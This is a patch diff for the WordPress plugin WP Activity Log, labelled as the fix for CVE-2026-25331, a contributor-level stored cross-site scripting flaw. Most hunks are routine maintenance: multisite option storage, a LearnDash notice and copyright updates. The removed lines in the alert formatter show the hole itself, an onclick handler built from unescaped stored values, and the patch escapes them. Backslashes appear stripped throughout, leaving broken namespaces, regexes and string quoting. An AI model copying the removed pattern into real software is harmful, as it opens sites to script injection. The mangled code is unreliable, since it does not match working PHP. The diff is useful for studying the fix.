CVE-2026-25331: Activity Log <= 5.5.4 – Authenticated (Contributor+) Stored Cross-Site Scripting (wp-security-audit-log)

--- a/wp-security-audit-log/classes/Controllers/class-alert-manager.php
+++ b/wp-security-audit-log/classes/Controllers/class-alert-manager.php
@@ -197,8 +197,6 @@
 		 * @since 4.5.0
 		 */
 		public static function init() {
-			// phpcs:disable
-			// phpcs:enable
 			add_action( 'shutdown', array( __CLASS__, 'commit_pipeline' ), 8 );
 		}

@@ -917,18 +915,14 @@
 			 */
 			$event_data = apply_filters( 'wsal_event_data_before_log', $event_data, $event_id );

-			// phpcs:ignore

 			foreach ( self::get_loggers() as $logger ) {
-				// phpcs:disable
-				// phpcs:enable
 				if ( $logger instanceof WSALLoggersWSAL_Ext_MirrorLogger ) {
 					$logger->log( $event_id, $event_data );
 				} else {
 					$logger::log( $event_id, $event_data );
 				}
 			}
-			// phpcs:disable
 		}

 		/**
@@ -1355,6 +1349,7 @@
 					'failed'       => esc_html__( 'Failed', 'wp-security-audit-log' ),
 					'denied'       => esc_html__( 'Denied', 'wp-security-audit-log' ),
 					'available'    => esc_html__( 'Available', 'wp-security-audit-log' ),
+					'completed'    => esc_html__( 'Completed', 'wp-security-audit-log' ),
 				);
 				// sort the types alphabetically.
 				asort( self::$event_types );
--- a/wp-security-audit-log/classes/Controllers/slack/class-slack-api.php
+++ b/wp-security-audit-log/classes/Controllers/slack/class-slack-api.php
@@ -7,7 +7,7 @@
  *
  * @since 5.3.4
  *
- * @copyright  2025 Melapress
+ * @copyright  2026 Melapress
  * @license    https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0
  *
  * @see       https://wordpress.org/plugins/wp-security-audit-log/
--- a/wp-security-audit-log/classes/Controllers/slack/class-slack.php
+++ b/wp-security-audit-log/classes/Controllers/slack/class-slack.php
@@ -5,7 +5,7 @@
  * @package    wsal
  * @subpackage slack
  * @since 5.3.4
- * @copyright  2025 Melapress
+ * @copyright  2026 Melapress
  * @license    https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0
  * @link       https://wordpress.org/plugins/wp-security-audit-log/
  */
--- a/wp-security-audit-log/classes/Controllers/twilio/class-twilio-api.php
+++ b/wp-security-audit-log/classes/Controllers/twilio/class-twilio-api.php
@@ -7,7 +7,7 @@
  *
  * @since 5.1.1
  *
- * @copyright  2025 Melapress
+ * @copyright  2026 Melapress
  * @license    https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0
  *
  * @see       https://wordpress.org/plugins/wp-security-audit-log/
@@ -99,7 +99,7 @@
 					return false;
 				}
 			}
-			self::$twilio_error_message = esc_html_e( 'Twilio is not set correctly', 'wp-security-audit-log' );
+			self::$twilio_error_message = esc_html__( 'Twilio is not set correctly', 'wp-security-audit-log' );

 			return false;
 		}
--- a/wp-security-audit-log/classes/Controllers/twilio/class-twilio.php
+++ b/wp-security-audit-log/classes/Controllers/twilio/class-twilio.php
@@ -5,7 +5,7 @@
  * @package    wsal
  * @subpackage twilio
  * @since 5.1.1
- * @copyright  2025 Melapress
+ * @copyright  2026 Melapress
  * @license    https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0
  * @link       https://wordpress.org/plugins/wp-security-audit-log/
  */
--- a/wp-security-audit-log/classes/Entities/Fields/class-base-fields.php
+++ b/wp-security-audit-log/classes/Entities/Fields/class-base-fields.php
@@ -476,113 +476,5 @@
 			return $field_sql;
 		}

-		/*
-		public static function convert_sql_where_to_php( string $where_clause ) {
-
-			// Trim and clean the input.
-			$where_clause = trim( $where_clause );
-
-			// Remove leading "WHERE" if present.
-			if ( stripos( $where_clause, 'WHERE' ) === 0 ) {
-				$where_clause = substr( $where_clause, 5 );
-			}
-
-			// Remove whitespace.
-			$where_clause = preg_replace( '/s+/', ' ', $where_clause );
-
-			// Process the conditions.
-			return self::parse_conditions( $where_clause );
-		}
-
-		public static function parse_conditions( $clause ) {
-			// Handle nested conditions using parentheses.
-
-			preg_match( '/(([^()]+))/', $clause, $matches );
-
-			if ( isset( $matches ) && ! empty( $matches ) ) {
-				$inner_clause  = $matches[1];
-				$php_condition = self::parse_conditions( $inner_clause );
-				$clause        = str_replace( $matches[0], "($php_condition)", $clause );
-			}
-
-			// Split by AND/OR, preserving operators.
-			$conditions     = preg_split( '/s+(AND|OR)s+/i', $clause, -1, PREG_SPLIT_DELIM_CAPTURE | PREG_SPLIT_NO_EMPTY );
-			$php_conditions = array();
-			$operator       = '&&'; // Default to AND.
-
-			foreach ( $conditions as $condition ) {
-				$condition = trim( $condition );
-
-				if ( preg_match( '/^(.*?)s*(LIKE|=|!=|<>|>|<|>=|<=|IN(|IN (|BETWEEN|IS NULL)s*(.*)$/i', $condition, $matches ) ) {
-					$field    = trim( $matches[1] );
-					$op       = strtoupper( trim( $matches[2] ) );
-					$value    = trim( $matches[3] );
-					$var_name = 'var_' . uniqid();
-
-					switch ( $op ) {
-						case 'LIKE':
-							// Handle LIKE values.
-							if ( preg_match( '/^'(.*)'$/', $value, $value_matches ) ) {
-								$php_conditions[] = "strpos($field, $var_name) !== false"; // Simulate LIKE.
-								$value            = "'" . addslashes( $value_matches[1] ) . "'";
-							}
-							echo "$$var_name = $value;n";
-							break;
-
-						case 'IN':
-							// Handle IN clause.
-							$value_array      = explode( ',', trim( $value, '() ' ) );
-							$value_array      = array_map( 'trim', $value_array );
-							$php_conditions[] = "$field IN (" . implode( ', ', array_map( fn( $v) => '$' . 'var_' . uniqid(), $value_array ) ) . ')';
-							foreach ( $value_array as $v ) {
-								echo '$var_' . uniqid() . ' = ' . addslashes( trim( $v, "'" ) ) . ";n"; // Assigning variables.
-							}
-							break;
-
-						case 'BETWEEN':
-							// Handle BETWEEN clause.
-							if ( preg_match( '/^'(.*?)'s+ANDs+'(.*?)'$/', $value, $between_matches ) ) {
-								$lower_bound      = 'var_' . uniqid();
-								$upperBound       = 'var_' . uniqid();
-								$php_conditions[] = "$field BETWEEN $$lower_bound AND $$upperBound";
-								echo "$$lower_bound = '" . addslashes( $between_matches[1] ) . "';n";
-								echo "$$upperBound = '" . addslashes( $between_matches[2] ) . "';n";
-							}
-							break;
-
-						case 'IS NULL':
-							// Handle IS NULL.
-							$php_conditions[] = "$field IS NULL";
-							break;
-
-						default:
-							// Handle other comparisons.
-							if ( preg_match( '/^'(.*)'$/', $value, $value_matches ) ) {
-								$php_conditions[] = "$field $op $$var_name";
-								$value            = "'" . addslashes( $value_matches[1] ) . "'";
-							} else {
-								$php_conditions[] = "$field $op $$var_name";
-							}
-							echo "$$var_name = $value;n";
-							break;
-					}
-				}
-			}
-
-			// Determine the logical operator based on the original clause.
-			if ( stripos( $clause, 'OR' ) !== false ) {
-				$operator = '||';
-			}
-
-			// Combine conditions into a single PHP statement.
-			return '(' . implode( " $operator ", $php_conditions ) . ')';
-		}
-
-			// // Example usage
-			// $sqlWhere     = "WHERE (name LIKE 'John%' OR name LIKE 'Doe%') AND (age > 30 OR status IN ('active', 'pending')) AND birthdate BETWEEN '1990-01-01' AND '2000-12-31' AND status IS NULL";
-			// $phpStatement = convertSqlWhereToPhp( $sqlWhere );
-
-			// echo 'PHP Statement: ' . $phpStatement . "n";
-			*/
 	}
 }
--- a/wp-security-audit-log/classes/Entities/class-occurrences-entity.php
+++ b/wp-security-audit-log/classes/Entities/class-occurrences-entity.php
@@ -766,8 +766,6 @@
 			$max_sdate = Plugin_Settings_Helper::get_pruning_date(); // Pruning date.
 			$archiving = Settings_Helper::is_archiving_set_and_enabled();

-			// phpcs:disable
-			// phpcs:enable

 			// Calculate limit timestamp.
 			$max_stamp = $now - ( strtotime( $max_sdate ) - $now );
--- a/wp-security-audit-log/classes/Helpers/class-logger.php
+++ b/wp-security-audit-log/classes/Helpers/class-logger.php
@@ -4,7 +4,7 @@
  *
  * @package    wsal
  * @subpackage utils
- * @copyright  2025 Melapress
+ * @copyright  2026 Melapress
  * @license    https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0
  * @link       https://wordpress.org/plugins/wp-security-audit-log/
  * @since 4.4.3
--- a/wp-security-audit-log/classes/Helpers/class-notices.php
+++ b/wp-security-audit-log/classes/Helpers/class-notices.php
@@ -4,7 +4,7 @@
  *
  * @package    wsal
  * @subpackage helpers
- * @copyright  2025 Melapress
+ * @copyright  2026 Melapress
  * @license    https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0
  * @link       https://wordpress.org/plugins/wp-security-audit-log/
  * @since 4.6.0
@@ -16,6 +16,7 @@

 use WSALHelpersSettings_Helper;
 use WSALUtilsAbstract_Migration;
+use WSALWP_SensorsHelpersLearnDash_Helper;

 if ( ! class_exists( 'WSALHelpersNotices' ) ) {

@@ -32,6 +33,13 @@
 		public const EBOOK_NOTICE = 'ebook-notice-show';

 		/**
+		 * Constant used for showing the LearnDash update notice.
+		 *
+		 * @since 5.6.0
+		 */
+		public const LEARNDASH_UPDATE_NOTICE = 'learndash-update-notice-dismissed';
+
+		/**
 		 * Holds the number of notices we have to show in the admin menu bubble.
 		 *
 		 * @var integer
@@ -74,9 +82,16 @@
 				// self::display_yearly_security_survey();
 				// }

-				$melapress_survey_2025 = Settings_Helper::get_boolean_option_value( 'melapress-survey-2025', false );
-				if ( ! $melapress_survey_2025 && ! self::is_black_friday_campaign_active() ) {
-					self::display_yearly_wsal_melapress_survey();
+				$learndash_update_notice = Settings_Helper::get_boolean_option_value( self::LEARNDASH_UPDATE_NOTICE, false );
+
+				if ( ! $learndash_update_notice && LearnDash_Helper::is_learndash_active() ) {
+					self::display_learndash_update_notice();
+				} else {
+					$melapress_survey_2025 = Settings_Helper::get_boolean_option_value( 'melapress-survey-2025', false );
+
+					if ( ! $melapress_survey_2025 && ! self::is_black_friday_campaign_active() ) {
+						self::display_yearly_wsal_melapress_survey();
+					}
 				}

 				// @free:start
@@ -119,11 +134,21 @@
 			// ++self::$number_of_notices;
 			// }

-			$melapress_survey_2025 = Settings_Helper::get_boolean_option_value( 'melapress-survey-2025', false );
-			if ( ! $melapress_survey_2025 && ! self::is_black_friday_campaign_active() ) {
-				add_action( 'wp_ajax_dismiss_melapress_survey', array( __CLASS__, 'dismiss_melapress_survey' ) );
+			$learndash_update_notice = Settings_Helper::get_boolean_option_value( self::LEARNDASH_UPDATE_NOTICE, false );
+
+			if ( ! $learndash_update_notice && LearnDash_Helper::is_learndash_active() ) {
+				add_action( 'wp_ajax_dismiss_learndash_update_notice', array( __CLASS__, 'dismiss_learndash_update_notice' ) );

 				++self::$number_of_notices;
+			} else {
+
+				$melapress_survey_2025 = Settings_Helper::get_boolean_option_value( 'melapress-survey-2025', false );
+
+				if ( ! $melapress_survey_2025 && ! self::is_black_friday_campaign_active() ) {
+					add_action( 'wp_ajax_dismiss_melapress_survey', array( __CLASS__, 'dismiss_melapress_survey' ) );
+
+					++self::$number_of_notices;
+				}
 			}

 			// @free:start
@@ -255,6 +280,29 @@
 		}

 		/**
+		 * Ajax request handler to dismiss the LearnDash update notice.
+		 *
+		 * @return void
+		 *
+		 * @since 5.6.0
+		 */
+		public static function dismiss_learndash_update_notice() {
+			if ( ! Settings_Helper::current_user_can( 'edit' ) || ! current_user_can( 'manage_options' ) ) {
+				wp_send_json_error();
+			}
+
+			check_ajax_referer( 'dismiss_learndash_update_notice', 'nonce' );
+
+			$update_setting = Settings_Helper::set_option_value( self::LEARNDASH_UPDATE_NOTICE, true );
+
+			if ( ! $update_setting ) {
+				wp_send_json_error( esc_html__( 'Failed to dismiss the notice. Please try again.', 'wp-security-audit-log' ) );
+			}
+
+			wp_send_json_success();
+		}
+
+		/**
 		 * Display the 2025 MelaPress survey admin notice
 		 *
 		 * @since 5.5.1
@@ -312,6 +360,32 @@
 			<?php
 		}

+		/**
+		 * Display the LearnDash update notice.
+		 *
+		 * @return void
+		 *
+		 * @since 5.6.0
+		 */
+		public static function display_learndash_update_notice() {
+			if ( ! current_user_can( 'manage_options' ) ) {
+				return;
+			}
+
+			$review_url = WP_Helper::get_admin_url( 'admin.php?page=wsal-togglealerts#cat-LearnDash-LMS' );
+
+			?>
+			<div style="position: relative; padding-top: 8px; padding-bottom: 8px; border-left-color: #009344;" class="wsal-notice notice notice-info" id="wsal-learndash-update-notice" data-dismiss-action="dismiss_learndash_update_notice" data-nonce="<?php echo esc_attr( wp_create_nonce( 'dismiss_learndash_update_notice' ) ); ?>">
+				<p style="font-weight:700; margin-top: 0;"><?php esc_html_e( 'Great news! We've added support for LearnDash LMS.', 'wp-security-audit-log' ); ?></p>
+				<p><?php esc_html_e( 'You can now track course creation, lesson modifications, student enrollments, quiz completions, and more.', 'wp-security-audit-log' ); ?></p>
+				<p><?php esc_html_e( 'To help keep your activity log focused and efficient, we've carefully selected which events are enabled by default. You can review and customize which LearnDash events you want to track at any time.', 'wp-security-audit-log' ); ?></p>
+				<a href="<?php echo esc_url( $review_url ); ?>" style="background-color: #009344;" class="button button-primary"><?php esc_html_e( 'Review Settings', 'wp-security-audit-log' ); ?></a>
+				<button type="button" class="button wsal-plugin-notice-close" style="margin-left: 8px;"><?php esc_html_e( 'Not Now', 'wp-security-audit-log' ); ?></button>
+				<button type="button" class="notice-dismiss wsal-plugin-notice-close"><span class="screen-reader-text"><?php esc_html_e( 'Dismiss this notice.', 'wp-security-audit-log' ); ?></span></button>
+			</div>
+			<?php
+		}
+
 		/**
 		 * Get the current date in Y-m-d format (derived from DateTimeImmutable).
 		 *
--- a/wp-security-audit-log/classes/Helpers/class-plugins-helper.php
+++ b/wp-security-audit-log/classes/Helpers/class-plugins-helper.php
@@ -7,7 +7,7 @@
  *
  * @since 4.5.0
  *
- * @copyright  2025 Melapress
+ * @copyright  2026 Melapress
  * @license    https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0
  *
  * @see       https://wordpress.org/plugins/wp-2fa/
--- a/wp-security-audit-log/classes/Helpers/class-settings-helper.php
+++ b/wp-security-audit-log/classes/Helpers/class-settings-helper.php
@@ -598,6 +598,7 @@
 		 * @return mixed
 		 *
 		 * @since 4.4.3
+		 * @since 5.6.0 - Updated to get options from the correct multisite db table for settings: sitemeta. And added a fallback to prevent possible errors during the migration phase from 5.5.4 to 5.6.0.
 		 */
 		private static function get_option_value_internal( $option_name = '', $default = null ) {
 			// bail early if no option name was requested.
@@ -606,17 +607,22 @@
 			}

 			if ( WP_Helper::is_multisite() ) {
-				if ( function_exists( 'switch_to_blog' ) ) {
+				// Try to get the network option in the new table location: sitemeta (WSAL 5.6.0+).
+				$result = get_network_option( null, $option_name, null );
+
+				/**
+				 * Fallback compatibility for migration from 5.5.4 to 5.6.0: if not found in new location,
+				 * try the old location with the wrong get_main_network_id(), present in older WSAL versions.
+				 */
+				if ( null === $result ) {
 					switch_to_blog( get_main_network_id() );
-				}
-			}

-			$result = get_option( $option_name, $default );
+					$result = get_option( $option_name, $default );

-			if ( WP_Helper::is_multisite() ) {
-				if ( function_exists( 'restore_current_blog' ) ) {
 					restore_current_blog();
 				}
+			} else {
+				$result = get_option( $option_name, $default );
 			}

 			return maybe_unserialize( $result );
@@ -633,6 +639,7 @@
 		 * @return bool Whether the option was updated.
 		 *
 		 * @since 4.6.0
+		 * @since 5.6.0 - Updated to save options to the correct multisite db table for settings, sitemeta.
 		 */
 		private static function set_option_value_internal( $option_name = '', $value = null, $autoload = false ) {
 			// bail early if no option name or value was passed.
@@ -641,24 +648,17 @@
 			}

 			if ( WP_Helper::is_multisite() ) {
-				if ( function_exists( 'switch_to_blog' ) ) {
-					switch_to_blog( get_main_network_id() );
-				}
-			}
+				$result = update_network_option( null, $option_name, $value );
+
+			} elseif ( false === $autoload ) {
+					delete_option( $option_name );
+
+					$result = add_option( $option_name, $value, '', $autoload );

-			if ( false === $autoload ) {
-				delete_option( $option_name );
-				$result = add_option( $option_name, $value, '', $autoload );
 			} else {
 				$result = update_option( $option_name, $value, $autoload );
 			}

-			if ( WP_Helper::is_multisite() ) {
-				if ( function_exists( 'restore_current_blog' ) ) {
-					restore_current_blog();
-				}
-			}
-
 			return $result;
 		}

@@ -771,6 +771,11 @@

 			$ip = parse_url( 'http://' . $ip, PHP_URL_HOST );

+			// Prevent fatal error with str replace if $ip is false or null.
+			if ( false === $ip || null === $ip ) {
+				return 'Unknown';
+			}
+
 			$ip = str_replace( array( '[', ']' ), '', $ip );

 			return $ip;
@@ -995,9 +1000,21 @@
 		 * @return int[] List of alerts disabled by default.
 		 *
 		 * @since 4.5.0
+		 * @since 5.6.0 - Added filter to allow extensions to add their own default disabled alerts.
 		 */
 		public static function get_default_disabled_alerts() {
-			return array( 5010, 5011, 5012, 5013, 5014, 5015, 5016, 5017, 5018, 5022, 5023, 5024, 6066, 6067, 6068, 6069, 6070, 6071, 6072 );
+			$alerts = array( 5010, 5011, 5012, 5013, 5014, 5015, 5016, 5017, 5018, 5022, 5023, 5024, 6066, 6067, 6068, 6069, 6070, 6071, 6072 );
+
+			/**
+			 * Filters the list of alerts disabled by default.
+			 *
+			 * Allows extensions to add their own default disabled alerts.
+			 *
+			 * @param int[] $alerts - List of alert IDs disabled by default.
+			 *
+			 * @since 5.6.0
+			 */
+			return apply_filters( 'wsal_default_disabled_alerts', $alerts );
 		}

 		/**
@@ -1853,12 +1870,24 @@
 			$was_enabled = self::get_boolean_option_value( 'pruning-date-e', false );
 			$old_period  = self::get_option_value( 'pruning-date', '3 months' );

+			/**
+			 * If enable is true, and the $new_date is identical to the $old_period, and $was_enabled is false:
+			 * then it's the first time we're loading this after plugin activation and reset settings.
+			 *
+			 * Save this in a variable to skip event 6052.
+			 */
+			$skip_first_time_event_trigger = $enable && ( $new_date === $old_period ) && ! $was_enabled;
+
 			if ( ! $was_enabled && $enable ) {
 				// The retention period is being enabled.
 				self::set_option_value( 'pruning-date', $new_date );
 				self::set_option_value( 'pruning-unit', $new_unit );
 				self::set_boolean_option_value( 'pruning-date-e', $enable );

+				if ( $skip_first_time_event_trigger ) {
+					return;
+				}
+
 				Alert_Manager::trigger_event(
 					6052,
 					array(
--- a/wp-security-audit-log/classes/Helpers/class-uninstall-helper.php
+++ b/wp-security-audit-log/classes/Helpers/class-uninstall-helper.php
@@ -5,7 +5,7 @@
  * @package    wsal
  * @subpackage helpers
  * @since      4.6.0
- * @copyright  2025 Melapress
+ * @copyright  2026 Melapress
  * @license    https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0
  * @link       https://wordpress.org/plugins/wp-2fa/
  */
--- a/wp-security-audit-log/classes/Helpers/class-upgrade-notice.php
+++ b/wp-security-audit-log/classes/Helpers/class-upgrade-notice.php
@@ -5,7 +5,7 @@
  * @package    wsal
  * @subpackage helpers
  * @since      4.6.0
- * @copyright  2025 Melapress
+ * @copyright  2026 Melapress
  * @license    https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0
  * @link       https://wordpress.org/plugins/wp-2fa/
  */
--- a/wp-security-audit-log/classes/Helpers/class-user-helper.php
+++ b/wp-security-audit-log/classes/Helpers/class-user-helper.php
@@ -5,7 +5,7 @@
  * @package    wsal
  * @subpackage helpers
  * @since      4.6.0
- * @copyright  2025 Melapress
+ * @copyright  2026 Melapress
  * @license    https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0
  * @link       https://wordpress.org/plugins/wp-2fa/
  */
--- a/wp-security-audit-log/classes/Helpers/class-user-utils.php
+++ b/wp-security-audit-log/classes/Helpers/class-user-utils.php
@@ -5,7 +5,7 @@
  * @package    wsal
  * @subpackage helpers
  * @since      4.6.0
- * @copyright  2025 Melapress
+ * @copyright  2026 Melapress
  * @license    https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0
  * @link       https://wordpress.org/plugins/wp-2fa/
  */
--- a/wp-security-audit-log/classes/Helpers/class-wp-helper.php
+++ b/wp-security-audit-log/classes/Helpers/class-wp-helper.php
@@ -7,7 +7,7 @@
  *
  * @since      4.4.2
  *
- * @copyright  2025 Melapress
+ * @copyright  2026 Melapress
  * @license    https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0
  *
  * @see       https://wordpress.org/plugins/wp-2fa/
@@ -257,23 +257,33 @@
 		 *
 		 * Handled option name with and without the prefix for backwards compatibility.
 		 *
-		 * @since  4.0.2
-		 *
 		 * @param string $option_name Name of the option to delete.
 		 *
 		 * @return bool
+		 *
+		 * @since  4.0.2
+		 * @since 5.6.0 - Updated to delete options from the correct multisite db table for settings, sitemeta. And added a fallback to prevent possible errors during the migration phase from 5.5.4 to 5.6.0.
 		 */
 		public static function delete_global_option( $option_name = '' ) {
 			$prefixed_name = self::prefix_name( $option_name );

 			if ( self::is_multisite() ) {
-				switch_to_blog( get_main_network_id() );
-			}
+				// Try to delete the network option in the new table location: sitemeta (WSAL 5.6.0+).
+				$result = delete_network_option( null, $prefixed_name );

-			$result = delete_option( $prefixed_name );
+				/**
+				 * Fallback compatibility for migration from 5.5.4 to 5.6.0: if not found in new location,
+				 * try the old location with the wrong get_main_network_id(), present in older WSAL versions.
+				 */
+				if ( false === $result ) {
+					switch_to_blog( get_main_network_id() );

-			if ( self::is_multisite() ) {
-				restore_current_blog();
+					$result = delete_option( $prefixed_name );
+
+					restore_current_blog();
+				}
+			} else {
+				$result = delete_option( $prefixed_name );
 			}

 			return $result;
@@ -315,13 +325,10 @@
 			$prefixed_name = self::prefix_name( $option_name );

 			if ( self::is_multisite() ) {
-				switch_to_blog( get_main_network_id() );
-			}
-
-			$result = update_option( $prefixed_name, $value, $autoload );
-
-			if ( self::is_multisite() ) {
-				restore_current_blog();
+				// Network options don't support autoload parameter.
+				$result = update_network_option( null, $prefixed_name, $value );
+			} else {
+				$result = update_option( $prefixed_name, $value, $autoload );
 			}

 			return $result;
@@ -337,6 +344,7 @@
 		 * @return mixed
 		 *
 		 * @since  4.1.3
+		 * @since 5.6.0 - Updated to get options from the correct multisite db table for settings, sitemeta. And added a fallback to prevent possible errors during the migration phase from 5.5.4 to 5.6.0.
 		 */
 		public static function get_global_option( $option_name = '', $default = null ) {
 			// bail early if no option name was requested.
@@ -344,16 +352,20 @@
 				return;
 			}

-			if ( self::is_multisite() ) {
-				switch_to_blog( get_main_network_id() );
-			}
-
 			$prefixed_name = self::prefix_name( $option_name );

-			$result = get_option( $prefixed_name, $default );
-
 			if ( self::is_multisite() ) {
-				restore_current_blog();
+				// Try new location first (wp_sitemeta).
+				$result = get_network_option( null, $prefixed_name, null );
+
+				// Backward compatibility for migration from 5.5.4 to 5.6.0: fallback to old location (wp_options of main site).
+				if ( null === $result ) {
+					switch_to_blog( get_main_network_id() );
+					$result = get_option( $prefixed_name, $default );
+					restore_current_blog();
+				}
+			} else {
+				$result = get_option( $prefixed_name, $default );
 			}

 			return maybe_unserialize( $result );
@@ -1087,5 +1099,22 @@
 		public static function generate_data() {
 			self::$data = self::get_registered_post_types();
 		}
+
+		/**
+		 * Attempt to get the server side HTTP referrer.
+		 *
+		 * @return string The HTTP referrer or 'Not found' if not available.
+		 *
+		 * @since 5.6.0
+		 */
+		public static function try_to_get_http_referrer(): string {
+			$result = esc_html__( 'Not found', 'wp-security-audit-log' );
+
+			if ( isset( $_SERVER['HTTP_REFERER'] ) && ! empty( $_SERVER['HTTP_REFERER'] ) ) {
+				$result = esc_url_raw( wp_unslash( $_SERVER['HTTP_REFERER'] ) );
+			}
+
+			return $result;
+		}
 	}
 }
--- a/wp-security-audit-log/classes/Helpers/formatters/class-alert-formatter.php
+++ b/wp-security-audit-log/classes/Helpers/formatters/class-alert-formatter.php
@@ -62,8 +62,11 @@
 					// NULL value check is here because events related to user meta fields didn't have the MetaLink meta prior to version 4.3.2.

 					if ( $configuration['is_js_in_links_allowed'] && 'NULL' !== $value ) {
-						$label  = __( 'Exclude custom field from the monitoring', 'wp-security-audit-log' );
-						$result = "<a href="#" data-object-type='{$metadata['Object']}' data-disable-custom-nonce='" . wp_create_nonce( 'disable-custom-nonce' . $value ) . "' onclick="return WsalDisableCustom(this, '" . $value . "');"> {$label}</a>";
+						$label = __( 'Exclude custom field from the monitoring', 'wp-security-audit-log' );
+
+						$escaped_value = esc_js( $value );
+
+						$result = "<a href="#" data-object-type='" . esc_attr( $metadata['Object'] ) . "' data-disable-custom-nonce='" . esc_attr( wp_create_nonce( 'disable-custom-nonce' . $value ) ) . "' onclick="return WsalDisableCustom(this, '" . $escaped_value . "');"> " . esc_html( $label ) . '</a>';

 						return self::wrap_in_hightlight_markup( $result, $configuration, true );
 					}
@@ -227,6 +230,39 @@

 					return self::wrap_in_hightlight_markup( $return, $configuration );

+				/**
+				 * Allow users to expand truncated previous Login Page URL. These URLs can be long, so they're truncated by default.
+				 *
+				 * @since 5.6.0
+				 */
+				case '%LoginPageURL%' === $expression:
+					// If value is NULL or empty, return an empty string. This avoids displaying 'NULL' in the alert for old plugin versions before 5.6.0.
+					if ( 'NULL' === $value || empty( $value ) ) {
+						return '';
+					}
+
+					$max_length = $configuration['max_meta_value_length'];
+
+					if ( mb_strlen( $value ) > $max_length ) {
+						$truncated = mb_substr( $value, 0, $max_length );
+						$result    = '<span class="wsal-truncated-url"><strong>' . esc_html( $truncated ) . '...</strong></span>';
+
+						return $result;
+					}
+
+					// If JS in links is not allowed, we just show the full URL.
+					if ( mb_strlen( $value ) > $max_length ) {
+						$value = esc_html( $value );
+					}
+
+					return self::wrap_in_hightlight_markup( $value, $configuration );
+
+				case '%EditorLinkOrder%' === $expression:
+					if ( ! isset( $metadata['EditorLinkOrder'] ) ) {
+						return '';
+					}
+					return $metadata['EditorLinkOrder'];
+
 				default:
 					/**
 					 * Allows meta formatting via filter if no match was found.
@@ -284,7 +320,7 @@
 				case '%old_path%':
 				case '%FilePath%':
 					if ( mb_strlen( $value ) > $length ) {
-						$value = mb_substr( $value, 0, $length ); // phpcs:ignore
+						$value = mb_substr( $value, 0, $length );
 					}
 					break;
 				case '%MetaValue%':
--- a/wp-security-audit-log/classes/Helpers/settings/class-settings-builder.php
+++ b/wp-security-audit-log/classes/Helpers/settings/class-settings-builder.php
@@ -1128,9 +1128,6 @@
 			<?php
 		}

-		// phpcs:disable
-		// phpcs:enable
-		// phpcs:disable WordPress.Security.EscapeOutput.OutputNotEscaped

 		/**
 		 * Textarea
--- a/wp-security-audit-log/classes/ListAdminEvents/class-list-events.php
+++ b/wp-security-audit-log/classes/ListAdminEvents/class-list-events.php
@@ -7,7 +7,7 @@
  *
  * @since      4.6.0
  *
- * @copyright  2025 Melapress
+ * @copyright  2026 Melapress
  * @license    https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0
  *
  * @see       https://wordpress.org/plugins/wp-2fa/
@@ -166,7 +166,7 @@
 			$this->table_name = Occurrences_Entity::get_table_name( self::$wsal_db );
 			$this->table      = Occurrences_Entity::class;

-			/* @free:start */
+			// @free:start
 			add_action(
 				'wsal_search_filters_list',
 				function ( $which ) {
@@ -208,7 +208,7 @@
 				},
 				999
 			);
-			/* @free:end */
+			// @free:end
 		}

 		/**
@@ -254,11 +254,9 @@
 		<label class="screen-reader-text" for="<?php echo esc_attr( $input_id ); ?>"><?php echo esc_attr( $text ); ?>:</label>
 			<?php
 			$try_free_search = false;
-			// phpcs:ignore
-			/* @free:start */
+			// @free:start
 			$try_free_search = Settings_Helper::get_boolean_option_value( 'free-search-try' );
-			// phpcs:ignore
-			/* @free:end */
+			// @free:end

 			if ( $try_free_search ) {
 				?>
@@ -639,13 +637,6 @@
 					if ( false === $desc ) {
 						$desc = __( 'Alert description not found.', 'wp-security-audit-log' );
 					}
-					$extra_msg           = '';
-					$data_link           = '';
-					$modification_alerts = array( 1002, 1003 );
-					if ( in_array( (int) $item['alert_id'], $modification_alerts, true ) ) {
-						$extra_msg = '. Modify this alert.';
-						$data_link = add_query_arg( 'page', 'wsal-togglealerts#tab-users-profiles---activity', network_admin_url( 'admin.php' ) );
-					}

 					$disabled_events = array_flip( Settings_Helper::get_disabled_alerts() );

@@ -654,12 +645,12 @@
 					$id = ' id="alert_' . $item['alert_id'] . '"';

 					if ( isset( $disabled_event ) && ! empty( $disabled_event ) ) {
-						return '<span' . $id . ' class="log-disable" data-disabled="disabled" data-disable-alert-nonce="' . wp_create_nonce( 'disable-alert-nonce' . $item['alert_id'] ) . '" data-darktooltip="<strong>' . __( 'This event is disabled.', 'wp-security-audit-log' ) . '</strong><br>' . $item['alert_id'] . ' - ' . esc_html( $desc ) . $extra_msg . '" data-alert-id="' . $item['alert_id'] . '" ' . esc_attr( 'data-link=' . $data_link ) . ' >'
+						return '<span' . $id . ' class="log-disable" data-disabled="disabled" data-disable-alert-nonce="' . wp_create_nonce( 'disable-alert-nonce' . $item['alert_id'] ) . '" data-darktooltip="<strong>' . __( 'This event is disabled.', 'wp-security-audit-log' ) . '</strong><br>' . $item['alert_id'] . ' - ' . esc_html( $desc ) . '" data-alert-id="' . $item['alert_id'] . '">'
 						. str_pad( (string) $item['alert_id'], 4, '0', STR_PAD_LEFT ) . ' </span>';
 					}

-					return '<span' . $id . ' class="log-disable" data-disable-alert-nonce="' . wp_create_nonce( 'disable-alert-nonce' . $item['alert_id'] ) . '" data-darktooltip="<strong>' . __( 'Disable this type of event.', 'wp-security-audit-log' ) . '</strong><br>' . $item['alert_id'] . ' - ' . esc_html( $desc ) . $extra_msg . '" data-alert-id="' . $item['alert_id'] . '" ' . esc_attr( 'data-link=' . $data_link ) . ' >'
-						. str_pad( (string) $item['alert_id'], 4, '0', STR_PAD_LEFT ) . ' </span>';
+					return '<span' . $id . ' class="log-disable" data-disable-alert-nonce="' . wp_create_nonce( 'disable-alert-nonce' . $item['alert_id'] ) . '" data-darktooltip="' . $item['alert_id'] . ' - ' . esc_html( $desc ) . '" data-alert-id="' . $item['alert_id'] . '">'
+				. str_pad( (string) $item['alert_id'], 4, '0', STR_PAD_LEFT ) . ' </span>';
 				case 'code':
 					$code = 0;
